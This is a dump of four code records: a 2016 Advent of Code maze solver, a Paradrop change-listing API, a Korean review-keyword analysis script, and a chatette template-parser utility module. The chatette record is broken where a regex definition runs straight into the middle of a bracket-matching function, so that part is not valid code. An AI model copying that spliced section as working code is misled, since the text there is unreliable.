+{"seq_id":"123015140","text":"input = 1358\n\ndef isOpen(x, y):\n    number = (x * x) + (3 * x) + (2 * x * y) + y + (y * y)\n    number += input\n    binary = bin(number)\n    one = 0\n    for b in binary:\n        if b == \"1\":\n            one += 1\n    return one % 2 == 0\n\nvisited = {}\npossible = []\ndestination = False\n\ndef rec(x, y, steps):\n    global destination\n\n    # don't visit multiple times, which could create loops\n    if (x,y) in visited or x < 0 or y < 0:\n        return\n\n    if steps == 51:\n        destination = True\n        return\n    \n    # add to visited\n    visited[(x,y)] = True\n\n    steps += 1\n    # check if possible to set a step for every direction\n    if isOpen(x+1, y):\n        possible.append([x+1, y, steps])\n    if isOpen(x, y+1):\n        possible.append([x, y+1, steps])\n    if isOpen(x-1, y):\n        possible.append([x-1, y, steps])\n    if isOpen(x, y-1):\n        possible.append([x, y-1, steps])\n\nrec(1, 1, 0) # starting point\nwhile not destination:\n    for i in possible:\n        rec(i[0], i[1], i[2])\n\nprint(len(visited))\n\n# part 2: 141\n","sub_path":"2016/13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"340176702","text":"import json\n\nfrom klein import Klein\nfrom twisted.internet import reactor\nfrom twisted.internet.defer import inlineCallbacks, returnValue\n\nfrom paradrop.base import pdutils\nfrom paradrop.base.output import out\nfrom . import cors\n\n\nclass ChangeApi(object):\n    routes = Klein()\n\n    def __init__(self, update_manager):\n        self.update_manager = update_manager\n\n    @routes.route('/', methods=['GET'])\n    def get_changes(self, request):\n        \"\"\"\n        Get list of active and queued changes.\n\n        Note: we use the term \"change\" even though, internally, the objects are\n        referred to as \"updates\". The word \"update\" has become so overloaded it\n        causes much confusion. A \"change\" is an atomic and self-contained\n        alteration to the running state of the system. A \"change\" could install\n        a chute, remove a chute, change the host configuration, etc.\n        \"\"\"\n        cors.config_cors(request)\n        request.setHeader('Content-Type', 'application/json')\n\n        changes = []\n\n        update = self.update_manager.active_change\n        if update is not None:\n            changes.append({\n                'id': update.change_id,\n                'updateClass': update.updateClass,\n                'updateType': update.updateType,\n                'name': getattr(update, 'name', None),\n                'version': getattr(update, 'version', None),\n                'status': 'processing'\n            })\n\n        for update in self.update_manager.updateQueue:\n            changes.append({\n                'id': update.change_id,\n                'updateClass': update.updateClass,\n                'updateType': update.updateType,\n                'name': getattr(update, 'name', None),\n                'version': getattr(update, 'version', None),\n                'status': 'queued'\n            })\n\n        return json.dumps(changes)\n","sub_path":"paradrop/daemon/paradrop/backend/change_api.py","file_name":"change_api.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"101089229","text":"from string import ascii_letters\nfrom nltk.tokenize import sent_tokenize\nfrom wordcloud import WordCloud\nfrom PIL import Image\nfrom wordcloud import ImageColorGenerator\nfrom gensim.models import word2vec\nfrom sklearn.manifold import TSNE\n\n\nimport nltk\nimport math\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom konlpy.tag import Okt\n\n'''\nFiles loaded\n    update_word_remake.csv : update dates and update-category keyword entries\n    update_review/update_review_YYYY년MM월DD일.csv : review data for each update period\n    noun_stopword.txt \n    YYYY년MM월DD일_category.txt\n    \n    \nFiles saved\n'''\n\n\n\nplt.rc('font', family='Malgun Gothic')\nplt.rcParams[\"figure.figsize\"] = (15,6)\n\n# image for each sentiment label\nimage_path = {'긍정':'positive.png','부정':'negative.jpg','복합':'middle.png'}\n\nfilename = 'update_word_remake.csv'\nforFrame = pd.read_csv(filename,index_col=0,usecols=['update_id','year','month','day','word'])\n\n# fd: full date string\nforFrame['fd'] = forFrame['year'].apply(lambda x : str(x))\nforFrame['fd'] += 
forFrame['month'].apply(lambda x : '-'+str(x))\nforFrame['fd'] += forFrame['day'].apply(lambda x : '-'+str(x))\n\n\ndef analyData(forFrame):\n # 내가 사용할 형태소 분석기 불러오기\n okt = Okt()\n review_dict = {}\n\n\n # 불용어 처리\n Stopword = open('noun_stopword.txt','r',encoding='utf-8').read().split(',')\n # 각 업데이트별 데이터 분석\n for itrow in forFrame.iterrows():\n # 해당 업데이트에 관련된 리뷰데이터 파일 불러오기\n reviewframe = pd.read_csv(f'update_review/update_review_{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일.csv')\n\n # 리뷰프레임을 Label로 구별하여 review_dict 사전에 넣기\n # review_dict['긍정'] = reviewframe\n review_dict['긍정'] = reviewframe[reviewframe['LABEL'] =='긍정']\n review_dict['복합'] = reviewframe[reviewframe['LABEL'] == '복합']\n review_dict['부정'] = reviewframe[reviewframe['LABEL'] == '부정']\n # review_dict['긍정'] = pd.concat([review_dict['긍정'],review_dict['복합']])\n\n\n # 감정별 데이터 분석\n for label,f in review_dict.items(): # items(감정, 감정 프레임)\n print(label)\n\n frame_row = [] # 명 : 키워드 , ��: 키워드 , 동 : 키워드\n\n noun_tokens = set() # score에 사용할 명사 데이터\n adjec_s = set()\n verb_s = set()\n unk_s = set()\n freq_dict = {}\n all_sentense_list = []\n\n # 리뷰 개수 설정하기\n item_cnt = 30000\n text_id_list = list(f['ID'][:item_cnt])\n print(text_id_list)\n # 각 감정 프레임에서 리뷰 100개만 형태소 분석기 돌리기\n # 한 리뷰에 해당하는 단어들 집합 넣을 사전 : TDM 행렬을 만드는데 사용\n review_tokens_dict = dict()\n for textid,text in enumerate(f['CONTENTS'][:item_cnt]): # contents iter\n # 해당 리뷰의 토큰은 textid key로 value list에 다 담는다.\n review_tokens_dict[text_id_list[textid]] = list()\n\n # 리뷰 문자 토큰화\n sent_tokens = sent_tokenize(text)\n # print(sent_tokens)\n # print('sent_l',len(sent_l))\n\n\n # 각 문장 토큰 단어 토큰화하기\n for sent_token in sent_tokens:\n\n word_tokens = [] # 각 문자의 단어 토큰\n\n # okt 형태소 분석기\n pos = okt.pos(sent_token,norm=True)\n # print(pos)\n\n # 명사,동사,형용사 만 추출하기\n pos = [x for x in pos\n if x[0] not in('롤러','지금','다른') and\n x[1] in ['Noun','Verb','Adjective','Unknown'] and\n len(x[0])>1]\n print(pos)\n # word2vec에 학습시킬 데이터 (명사,형용사,동사)\n word_tokens.extend([ x[0] for x in pos ])\n\n # word2vct 학습후 가중치행렬롤 만든 키워드 ( 명사)\n noun_tokens.update([ x[0] for x in pos if x[1] in ['Noun'] ]) # 중복제거 있음\n\n review_tokens_dict[text_id_list[textid]].extend([ x[0] for x in pos if x[1] in ['Noun'] ]) # 중복제거 없음 : 빈도수 행렬\n\n # 학습데이터 집합에 넣기\n all_sentense_list.append(word_tokens)\n # end Okt 형태소 분석기\n \"\"\" \n end result :\n all_sentense_list\n review_tokens_dict\n noun_tokens\n \"\"\"\n # end sent_tokenizer 문장 분석기\n\n\n # 분류한 토큰으로 word2vec 학습 시키기\n model = word2vec.Word2Vec(all_sentense_list,\n size=100,\n window=3,\n iter=5,\n min_count=1,\n hs=1,\n sg=1,\n workers=6)\n\n # size 100 concat_data dimesion 2로 줄이기\n tsne = TSNE(n_components=2) # 2차원 설정\n\n # noun_vocab : 학습된 명사 모록\n noun_vocab = [ w for w in model.wv.vocab if w in noun_tokens and w not in Stopword]\n W_data = model.wv[noun_vocab]\n # tsne\n W_tsne = tsne.fit_transform(W_data)\n\n # 차원 축소한 데이터 dataframe으로 만들기\n tsneFrame = pd.DataFrame(W_tsne,index=noun_vocab,columns=['x','y'])\n tsneFrame.to_csv(f'uclid_data/tsneFrame_{label}.csv')\n # print(tsneFrame)\n\n ################################\n # plt.figure()\n # # tsne프레임으로 좌표 그리기\n #\n # # fig.set_size_inches(100, 80)\n # # ax = fig.subplots()\n #\n # plt.scatter(tsneFrame['x'], tsneFrame['y'])\n # plt.title(f'{label}의 명사 관계도')\n # for word, pos in tsneFrame.iterrows():\n # plt.annotate(word, pos, fontsize=5)\n # ### 좌표 그리고 그 표를 파일로 저장하기\n # plt.savefig(f'uclid_data/{label}_noun_scatter.png', dpi=600, bbox_inches='tight')\n ###############################################\n\n # 거리 행렬 구하기 : noun_vocab * 
noun_vocab\n # 거리 행렬 프레임 데이터\n data_n = len(noun_vocab)**2\n print('data_n','\\n',data_n)\n uclid_data_list = list()\n\n sum_distance = 0\n for e1,row in tsneFrame.iterrows():\n frame_row_dict = dict()\n\n mean = 0\n\n # 기준 단어 좌표\n e1x = row.x\n e1y = row.y\n\n # 상대 단어 좌표와의 유클리드 거리 계산\n for e2 in noun_vocab:\n e2x = tsneFrame.loc[e2].x\n e2y = tsneFrame.loc[e2].y\n # 유클리드 거리 계산\n distance = math.sqrt((e1x-e2x)**2+(e1y-e2y)**2)\n sum_distance += distance\n frame_row_dict[e2] = distance\n # end row distance calculation\n uclid_data_list.append(frame_row_dict)\n uclidFrame = pd.DataFrame(uclid_data_list,index=noun_vocab)\n uclidFrame.to_csv(f'uclid_data/uclidFrame_{label}.csv')\n\n mean_distance = sum_distance/data_n\n\n v = 0\n\n for idx,row in uclidFrame.iterrows():\n for distance in row:\n v += (distance - mean_distance)**2\n\n v = v/data_n\n\n # var = uclidFrame.var()\n # print('var','\\n',var)\n # 가중치 행렬 구하기 : exp(-(거리 제곱)/(2*분산))\n weight_data_list = list()\n for w in noun_vocab:\n one_row_dict = dict()\n #가중치 계산\n # v = var[w]\n for wid,dis in uclidFrame[w].items():\n weight = math.exp(-(dis**2)/(2*v))\n one_row_dict[wid] = weight\n weight_data_list.append(one_row_dict)\n\n weightFrame = pd.DataFrame(weight_data_list,index=noun_vocab)\n weightFrame.to_csv(f'uclid_data/weightFrame_{label}.csv')\n\n # 가중치 행렬에서 업데이트 관련 키워드만 추출(명사)\n # 실제 채점할 단어 목록 리스트\n # print(list(itrow[1]['word']))\n up_kwd_list = itrow[1]['word'].split(',')\n # up_kwd_list = ['태블릿', '토큰', '조이스틱', '기기',\\\n # '매칭', '찾기', '트로피', '오락실', '테이크다운', \\\n # '바이러스', '비비', '닌자', '큐피트', '에이전트', \\\n # '길거리', '코알라', '히로인', '보석', '핫존', '미스터', '로봇', '깡통', '가방']\n category_noun_list = [w for w in weightFrame.index if w in up_kwd_list]\n # print('category_noun_list',category_noun_list)\n categoryFrame = weightFrame.loc[category_noun_list,:]\n # print('categoryFrame',categoryFrame)\n\n\n\n # TDM 행렬 구하기 : 단어 : 빈도수\n TDM_data_list = []\n for textid,review_token in review_tokens_dict.items():\n one_row_dict = {x:0 for x in noun_vocab}\n for t in review_token:\n if t in noun_vocab:\n one_row_dict[t] = one_row_dict[t]+1\n TDM_data_list.append(one_row_dict)\n\n TdmFrame = pd.DataFrame(TDM_data_list,index = review_tokens_dict.keys()).T\n TdmFrame.to_csv(f'uclid_data/tdmFrame_{label}.csv')\n\n # print(TdmFrame)\n\n score_arr = np.dot(categoryFrame,TdmFrame)\n\n # print('score_arr',score_arr)\n scoreFrame = pd.DataFrame(score_arr,index=category_noun_list,columns=review_tokens_dict.keys())\n # print(scoreFrame)\n scoreFrame.to_csv(f'uclid_data/scoreFrame_{label}.csv')\n # print(scoreFrame)\n # 분류된 단어 리스트\n top_word_list = []\n for textid, row in scoreFrame.T.iterrows():\n sort_key = row.sort_values(ascending=False)[:1].index\n # print(sort_key)\n top_word_list.append(list(sort_key)[0])\n print(top_word_list)\n # 분류된 단어 목록 파일에 저장\n with open(f'top_word_list_{label}.txt','w',encoding='utf-8') as file:\n file.write(','.join(top_word_list))\n\n # 분류된 단어가 속한 카테고리로 카운트:\n # txt file format\n # category1:kwd1,kwd2,kwd3....\n # category2:kwd1,kwd2,kwd3....\n imsi_list = [x.strip() for x in open(f'reference_category/{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일_category.txt', 'r', encoding='utf-8').readlines()]\n # 카테고리별 단어 집합 사전\n\n Category_dict = {i.split(':')[0]: i.split(':')[1].split(',') for i in imsi_list}\n Category_detail = {i.split(':')[0]:dict() for i in imsi_list}\n # 카테고리 : []\n Category_frequence_dict = { x:0 for x in Category_dict }\n for word in top_word_list:\n for k,v_list in Category_dict.items():\n if word in v_list:\n 
Category_frequence_dict[k] += 1\n if word in Category_detail[k]:\n Category_detail[k][word] += 1\n else:\n Category_detail[k][word] = 1\n detail_val_list = []\n detail_index_list = []\n for k1,indict in Category_detail.items():\n for k2,val in indict.items():\n detail_val_list.append(val)\n detail_index_list.append(k2)\n\n detailFrame = pd.DataFrame(detail_val_list,index=detail_index_list)\n detailFrame.columns = ['개수']\n\n CategoryFrame = pd.DataFrame(Category_frequence_dict,index=[0])\n CategoryFrame = CategoryFrame.T\n CategoryFrame.columns = ['개수']\n CategoryFrame = CategoryFrame.loc[CategoryFrame['개수']>0]\n\n # 관심 카테고리 비중 그래프 그리기 ########################\n plt.figure()\n CategoryFrame['개수'].plot(kind='pie',autopct='%.2f%%')\n plt.title(f'{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일_업데이트_{label}_관심카테고리')\n\n category_file_name = f'pie_graph_category_{label}.png'\n plt.savefig(category_file_name, dpi=600, bbox_inches='tight')\n\n print(CategoryFrame.index)\n\n # 키워드별 빈도 막대 그래프 :\n plt.figure()\n barFrame = pd.DataFrame(top_word_list,columns=['kwd'])\n barGroup = barFrame.groupby(by='kwd')['kwd']\n bardata = barGroup.count()\n\n\n bardata.plot(kind='barh')\n plt.title(f'{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일_{label}_카테고리_세부내역')\n bar_file_name = f'bar_graph_category_{label}.png'\n plt.savefig(bar_file_name, dpi=600, bbox_inches='tight')\n # plt.show()\n\n fig, ax = plt.subplots()\n\n size = 0.3\n vals = np.array([[60., 32.], [37., 40.], [29., 10.]])\n\n cmap = plt.get_cmap(\"tab20c\")\n outer_colors = cmap(np.arange(3) * 4)\n inner_colors = cmap(np.array([1, 2, 5, 6, 9, 10]))\n\n ax.pie(CategoryFrame['개수'],labeldistance=1.1, labels=CategoryFrame.index,radius=1, colors=outer_colors,\n wedgeprops=dict(width=size, edgecolor='w'))\n\n ax.pie(detailFrame['개수'],labeldistance=0.7,labels=detailFrame.index, radius=1 - size, colors=inner_colors,\n wedgeprops=dict(width=size, edgecolor='w'))\n\n ax.set(aspect=\"equal\", title='Pie plot with `ax.pie`')\n plt.show()\n\n # top_Series = pd.Series(top_10_list)\n # result = top_Series.value_counts()\n # top_dict = dict()\n # for x in result.items():\n # top_dict[x[0]] = x[1]\n\n # 워드 클라우드에 사용할 top 10\n # top_10_list = []\n # for textid,row in scoreFrame.T.iterrows():\n # sort_key = row.sort_values(ascending=False)[:10].index\n # print(sort_key)\n # top_10_list.extend(sort_key)\n #\n # top_Series = pd.Series(top_10_list)\n # result = top_Series.value_counts()\n # top_dict = dict()\n # for x in result.items():\n # top_dict[x[0]] = x[1]\n\n ########## 워드 클라우드###########\n # plt.figure()\n # mask = np.array(Image.open(image_path[label]))\n #\n # image_color = ImageColorGenerator(mask)\n #\n # wc = WordCloud(font_path='malgun.ttf', max_words=100, mask=mask,\n # background_color='rgba(255,255,255,0)', mode='RGBA', random_state=43)\n # wc.generate_from_frequencies(top_dict)\n # newwc = wc.recolor(color_func=image_color)\n # plt.imshow(wc)\n # plt.title(f'update_{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일')\n # plt.axis('off')\n #\n # # 워드클라우드 이미지로 저장하기\n # wcimgfilename = f'keyword_wordcloud/wcd_{itrow[1][0]}년{itrow[1][1]}월{itrow[1][2]}일_{label}.png'\n # plt.savefig(wcimgfilename, dpi=600, bbox_inches='tight')\n # print(wcimgfilename + '파일이 저장되었습니다.')\n # plt.close()\n ##########\n # end 감정별 데이터 분석\n\n # 각 업데이트별 데이터 분석\n\n\n# 업데이트 하나만 가지고 테스트 해본다.\nprint(forFrame.iloc[[0],:])\nanalyData(forFrame.iloc[[1],:])","sub_path":"업데이트별 리뷰 가중치행렬 카테고리 
분석/uclid_matrix_keyword.py","file_name":"uclid_matrix_keyword.py","file_ext":"py","file_size_in_byte":16498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"355386238","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule `chatette.parsing.parser_utils`\nContains utility functions that are specific to\nthe parsing of template files.\n\"\"\"\n\n\nimport re\nfrom enum import Enum\n\nfrom chatette import deprecations\nimport chatette.modifiers.representation as mods\n\nCOMMENT_SYM_DEPRECATED = ';'\nCOMMENT_MARKER = '//'\nESCAPE_SYM = '\\\\'\n\nALIAS_SYM = '~'\nSLOT_SYM = '@'\nINTENT_SYM = '%'\nUNIT_OPEN_SYM = '[' # This shouldn't be changed\nUNIT_CLOSE_SYM = ']' # id.\n\nANNOTATION_OPEN_SYM = '('\nANNOTATION_CLOSE_SYM = ')'\nANNOTATION_SEP = ','\nANNOTATION_ASSIGNMENT_SYM = ':'\nANNOTATION_IGNORED_SYM = \"'\"\n\nCHOICE_OPEN_SYM = r'{'\nCHOICE_CLOSE_SYM = r'}'\nCHOICE_SEP = '/' # TODO: deprecate and rather use '|'\n\nVARIATION_SYM = '#'\nRAND_GEN_SYM = '?' # This shouldn't be changed\nPERCENT_GEN_SYM = '/'\nCASE_GEN_SYM = '&'\nARG_SYM = '$' # This shouldn't be changed\n\nALT_SLOT_VALUE_NAME_SYM = '='\nALT_SLOT_VALUE_FIRST_SYM = '/'\n\nINCLUDE_FILE_SYM = '|'\n\n# TODO add special characters at the beginning of those to prevent people from\n# using them by chance\nRESERVED_VARIATION_NAMES = [\"all-variations-aggregation\", \"rules\",\n \"nb-gen-asked\", \"arg\"]\n\n\nPATTERN_COMMENT_DEPRECATED = re.compile(r\"(?= length:\n return None\n\n end_index = starting_index\n nb_closing_brackets_expected = 1\n while end_index < length and nb_closing_brackets_expected > 0:\n if tokens[end_index] == UNIT_OPEN_SYM:\n nb_closing_brackets_expected += 1\n elif tokens[end_index] == UNIT_CLOSE_SYM:\n nb_closing_brackets_expected -= 1\n end_index += 1\n end_index -= 1\n if end_index == starting_index:\n return None\n\n return tokens[starting_index:end_index]\n\ndef get_annotation_interior(tokens):\n \"\"\"\n Returns a list of tokens that represent the inside of the annotation\n that is present on this line.\n Returns `None` if there is no annotation in `tokens`.\n \"\"\"\n length = len(tokens)\n starting_index = 0\n while starting_index < length and tokens[starting_index] != ANNOTATION_OPEN_SYM:\n starting_index += 1\n starting_index += 1\n if starting_index >= length:\n return None\n\n end_index = starting_index\n nb_closing_brackets_expected = 1\n while end_index < length and nb_closing_brackets_expected > 0:\n if tokens[end_index] == ANNOTATION_OPEN_SYM:\n nb_closing_brackets_expected += 1\n elif tokens[end_index] == ANNOTATION_CLOSE_SYM:\n nb_closing_brackets_expected -= 1\n end_index += 1\n end_index -= 1\n if end_index == starting_index:\n return None\n\n return tokens[starting_index:end_index]\n\n\ndef check_declaration_validity(tokens_unit_inside):\n \"\"\"\n Check that the interior of a declaration is syntactically legal.\n Raises a `SyntaxError` if the declaration is invalid.\n The constraints checked are:\n - there is only one modifier of each type\n - there are no randgen or percentgen modifiers\n - `&` is at the beginning of the declaration (or nowhere)\n - there is a name after `#`\n - there is a value after `$`\n - there is a name either after `&` or at the beginning\n - the variation names are not reserved\n \"\"\"\n casegen_count = tokens_unit_inside.count(CASE_GEN_SYM)\n if casegen_count > 1:\n raise SyntaxError(\"There can be only one case generation modifier \"+\n \"in a unit declaration.\")\n if casegen_count == 1 and 
tokens_unit_inside.index(CASE_GEN_SYM) != 0:\n raise SyntaxError(\"Case generation modifiers have to be at the start \"+\n \"of a unit declaration.\")\n\n if casegen_count == 0 and is_special_sym(tokens_unit_inside[0]):\n raise SyntaxError(\"Unit declarations must be named.\")\n elif casegen_count == 1 and len(tokens_unit_inside) <= 1:\n raise SyntaxError(\"Unit declarations must be named.\")\n elif casegen_count == 1 and is_special_sym(tokens_unit_inside[1]):\n raise SyntaxError(\"Unit declarations must be named.\")\n\n variation_count = tokens_unit_inside.count(VARIATION_SYM)\n if variation_count > 1:\n raise SyntaxError(\"There can be only one variation modifier \"+\n \"in a unit declaration.\")\n if variation_count == 1:\n variation_name_index = tokens_unit_inside.index(VARIATION_SYM)+1\n if variation_name_index >= len(tokens_unit_inside) \\\n or is_special_sym(tokens_unit_inside[variation_name_index]):\n raise SyntaxError(\"Variations must be named.\")\n variation_name = tokens_unit_inside[variation_name_index]\n if variation_name in RESERVED_VARIATION_NAMES:\n raise SyntaxError(\"The following variation names are reserved: \"+\n str(RESERVED_VARIATION_NAMES)+\". Please don't \"+\n \"use them.\")\n\n argument_count = tokens_unit_inside.count(ARG_SYM)\n if argument_count > 1:\n raise SyntaxError(\"There can be only one argument modifier \"+\n \"per unit declaration.\")\n if argument_count == 1:\n argument_name_index = tokens_unit_inside.index(ARG_SYM)+1\n if argument_name_index >= len(tokens_unit_inside) \\\n or is_special_sym(tokens_unit_inside[argument_name_index]):\n raise SyntaxError(\"Arguments must be named.\")\n\n # TODO remove the following because you should allow ? and / in declarations?\n # or the tokenizer should not consider them special characters in this\n # case\n randgen_count = tokens_unit_inside.count(RAND_GEN_SYM)\n if randgen_count > 0:\n raise SyntaxError(\"Unit declarations cannot take a random generation \"+\n \"modifier.\")\n percentgen_count = tokens_unit_inside.count(PERCENT_GEN_SYM)\n if percentgen_count > 0:\n raise SyntaxError(\"Unit declarations cannot take a percentage for \"+\n \"the random generation modifier.\")\n\n\ndef check_reference_validity(tokens_unit_inside):\n \"\"\"\n Check that the interior of a reference is syntactically legal.\n Raises a `SyntaxError` if the reference is invalid.\n The constraints checked are:\n - there is only one modifier of each type\n - `/` is not there unless `?` is there\n - there is a number between 0 and 100 if `/` is present\n - `&` is at the beginning of the declaration (or nowhere)\n - there is a name after `#`\n - there is a name either after `&` or at the beginning\n \"\"\"\n casegen_count = tokens_unit_inside.count(CASE_GEN_SYM)\n if casegen_count > 1:\n raise SyntaxError(\"There can be only one case generation modifier \"+\n \"in a unit reference.\")\n if casegen_count == 1 and tokens_unit_inside.index(CASE_GEN_SYM) != 0:\n raise SyntaxError(\"Case generation modifiers have to be at the start \"+\n \"of a unit reference.\")\n\n if casegen_count == 0 and is_special_sym(tokens_unit_inside[0]):\n raise SyntaxError(\"Unit references must be named.\")\n elif casegen_count == 1 and len(tokens_unit_inside) <= 1:\n raise SyntaxError(\"Unit references must be named.\")\n elif casegen_count == 1 and is_special_sym(tokens_unit_inside[1]):\n raise SyntaxError(\"Unit references must be named.\")\n\n variation_count = tokens_unit_inside.count(VARIATION_SYM)\n if variation_count > 1:\n raise SyntaxError(\"There can be only 
one variation modifier \"+\n \"in a unit reference.\")\n if variation_count == 1:\n variation_name_index = tokens_unit_inside.index(VARIATION_SYM)+1\n if variation_name_index >= len(tokens_unit_inside) \\\n or is_special_sym(tokens_unit_inside[variation_name_index]):\n raise SyntaxError(\"Variations must be named.\")\n variation_name = tokens_unit_inside[variation_name_index]\n if variation_name in RESERVED_VARIATION_NAMES:\n raise SyntaxError(\"The following variation names are reserved: \"+\n str(RESERVED_VARIATION_NAMES)+\". Please don't \"+\n \"use them.\")\n\n argument_count = tokens_unit_inside.count(ARG_SYM)\n if argument_count > 1:\n raise SyntaxError(\"There can be only one argument modifier \"+\n \"per unit reference.\")\n # if argument_count == 1:\n # argument_name_index = tokens_unit_inside.index(ARG_SYM)+1\n # if argument_name_index >= len(tokens_unit_inside) \\\n # or is_special_sym(tokens_unit_inside[argument_name_index]):\n # raise SyntaxError(\"Arguments must be named.\")\n\n randgen_count = tokens_unit_inside.count(RAND_GEN_SYM)\n if randgen_count > 1:\n raise SyntaxError(\"There can be only one random generation modifier \"+\n \"per unit reference.\")\n percentgen_count = tokens_unit_inside.count(PERCENT_GEN_SYM)\n if percentgen_count > 1:\n raise SyntaxError(\"There can be only one percentage for generation \"+\n \"modifier per unit reference.\")\n if percentgen_count == 1 and randgen_count == 0:\n raise SyntaxError(\"There cannot be a percentage for generation \"+\n \"modifier if there is no random generation modifier \"+\n \"(did you mean to escape '\"+PERCENT_GEN_SYM+\"'?)\")\n if percentgen_count == 1:\n index_randgen = tokens_unit_inside.index(RAND_GEN_SYM)\n index_percentgen = tokens_unit_inside.index(PERCENT_GEN_SYM)\n if index_randgen > index_percentgen:\n raise SyntaxError(\"A percentage for generation modifier must \"+\n \"always be right after the random generation \"+\n \"modifier.\")\n if index_percentgen == len(tokens_unit_inside)-1:\n raise SyntaxError(\"No percentage found after the special symbol \"+\n \"for percentage modifier.\")\n try:\n percentgen = int(tokens_unit_inside[index_percentgen+1])\n except ValueError:\n raise SyntaxError(\"Percentage for generation modifiers need to be \"+\n \"an integer.\")\n if percentgen < 0 or percentgen > 100:\n raise SyntaxError(\"Percentage for generation modifiers need to be \"+\n \"between 0 and 100.\")\n\ndef check_choice_validity(tokens_choice_inside):\n \"\"\"\n Check that the interior of a choice is syntactically legal.\n Deals with word groups as well.\n Raises a `SyntaxError` if the choice is invalid.\n As any sub-rules can be inside choices, we cannot check anything except\n that the last tokens is not a separator (or the two-to-last one if the\n last one is a random generation modifier).\n \"\"\"\n # TODO: deprecate `/` as choice separators AND percentgen\n # percentgen_count = tokens_choice_inside.count(PERCENT_GEN_SYM)\n # if percentgen_count > 0:\n # raise SyntaxError(\"Choices cannot take a percentage for generation \"+\n # \"modifier.\")\n if len(tokens_choice_inside) > 0:\n if tokens_choice_inside[-1] == CHOICE_SEP:\n raise SyntaxError(\"Choice cannot end with a choice separator. \" +\n \"Did you forget to escape the last character?\")\n if ( len(tokens_choice_inside) > 1\n and tokens_choice_inside[-1] == RAND_GEN_SYM\n and tokens_choice_inside[-2] == CHOICE_SEP):\n raise SyntaxError(\"Choice ends with an empty choice item. 
\" +\n \"Did you forget to escape the choice separator?\")\n\n\ndef check_word_group_validity(tokens_word_group_inside):\n \"\"\"\n Check that the interior of a choice is syntactically legal.\n Deals with word groups as well.\n Raises a `SyntaxError` if the choice is invalid.\n The constraints checked are:\n - there is only one modifier of each type\n - `/` and `#` are not there\n - `&` is at the beginning of the declaration (or nowhere)\n - choices are separated by '/' (not checked as there can be 0 or 1 choice)\n \"\"\"\n casegen_count = tokens_word_group_inside.count(CASE_GEN_SYM)\n if casegen_count > 1:\n raise SyntaxError(\"There can be only one case generation modifier \"+\n \"in a word group.\")\n if casegen_count == 1 and tokens_word_group_inside.index(CASE_GEN_SYM) != 0:\n raise SyntaxError(\"Case generation modifiers have to be at the start \"+\n \"of a word group.\")\n\n variation_count = tokens_word_group_inside.count(VARIATION_SYM)\n if variation_count > 0:\n raise SyntaxError(\"Word groups cannot take variation modifiers.\")\n\n argument_count = tokens_word_group_inside.count(ARG_SYM)\n if argument_count > 0:\n raise SyntaxError(\"Word groups cannot take arguments.\")\n\n randgen_count = tokens_word_group_inside.count(RAND_GEN_SYM)\n if randgen_count > 1:\n raise SyntaxError(\"There can be only one random generation modifier \"+\n \"per word group.\")\n percentgen_count = tokens_word_group_inside.count(PERCENT_GEN_SYM)\n if percentgen_count > 1:\n raise SyntaxError(\"There can be only one percentage for generation \"+\n \"modifier per word group.\")\n if percentgen_count == 1 and randgen_count == 0:\n raise SyntaxError(\"There cannot be a percentage for generation \"+\n \"modifier if there is no random generation modifier \"+\n \"(did you mean to escape '\"+PERCENT_GEN_SYM+\"'?)\")\n if percentgen_count == 1:\n index_randgen = tokens_word_group_inside.index(RAND_GEN_SYM)\n index_percentgen = tokens_word_group_inside.index(PERCENT_GEN_SYM)\n if index_randgen > index_percentgen:\n raise SyntaxError(\"A percentage for generation modifier must \"+\n \"always be right after the random generation \"+\n \"modifier.\")\n if index_percentgen == len(tokens_word_group_inside)-1:\n raise SyntaxError(\"No percentage found after the special symbol \"+\n \"for percentage modifier.\")\n try:\n percentgen = int(tokens_word_group_inside[index_percentgen+1])\n except ValueError:\n raise SyntaxError(\"Percentage for generation modifiers need to be \"+\n \"an integer.\")\n if percentgen < 0 or percentgen > 100:\n raise SyntaxError(\"Percentage for generation modifiers need to be \"+\n \"between 0 and 100.\")\n\n\ndef find_name(tokens_inside_unit):\n \"\"\"\n Finds the name of the unit from the tokens that represent the interior of\n a unit declaration or reference (inside the brackets (excluded)).\n @pre: there is no syntax error in this part.\n \"\"\"\n start_index = 0\n if tokens_inside_unit[0] == CASE_GEN_SYM:\n start_index = 1\n name = \"\"\n while ( start_index < len(tokens_inside_unit)\n and not is_special_sym(tokens_inside_unit[start_index])):\n name += tokens_inside_unit[start_index]\n start_index += 1\n return remove_escapement(name)\n\ndef find_words(tokens_inside_word_group):\n \"\"\"\n Finds the words in the tokens that represent the interior of a word group.\n Returns the list of those words in sequence.\n @pre: there is no syntax error in this part.\n \"\"\"\n words = []\n for token in tokens_inside_word_group:\n if token == CASE_GEN_SYM:\n continue\n if token in (RAND_GEN_SYM, 
VARIATION_SYM, ARG_SYM):\n return words\n words.append(token)\n return words\n\n\ndef find_modifiers_decl(tokens_inside_decl):\n \"\"\"\n Finds and create a representation of the modifiers from a list of tokens\n representing the inside of a unit declaration. Returns the representation.\n If the percentage of generation was present but couldn't be\n @pre: there is no syntax error in this part (except possibly for\n percentage of generation).\n \"\"\"\n modifiers = mods.UnitDeclarationModifiersRepr()\n\n i = 0\n if tokens_inside_decl[0] == CASE_GEN_SYM:\n modifiers.casegen = True\n i += 1\n\n expecting_variation = False\n expecting_argument = False\n while i < len(tokens_inside_decl):\n if tokens_inside_decl[i] == VARIATION_SYM:\n modifiers.variation_name = \"\"\n expecting_variation = True\n expecting_argument = False\n elif tokens_inside_decl[i] == ARG_SYM:\n modifiers.argument_name = \"\"\n expecting_variation = False\n expecting_argument = True\n elif expecting_variation:\n modifiers.variation_name += tokens_inside_decl[i]\n elif expecting_argument:\n modifiers.argument_name += 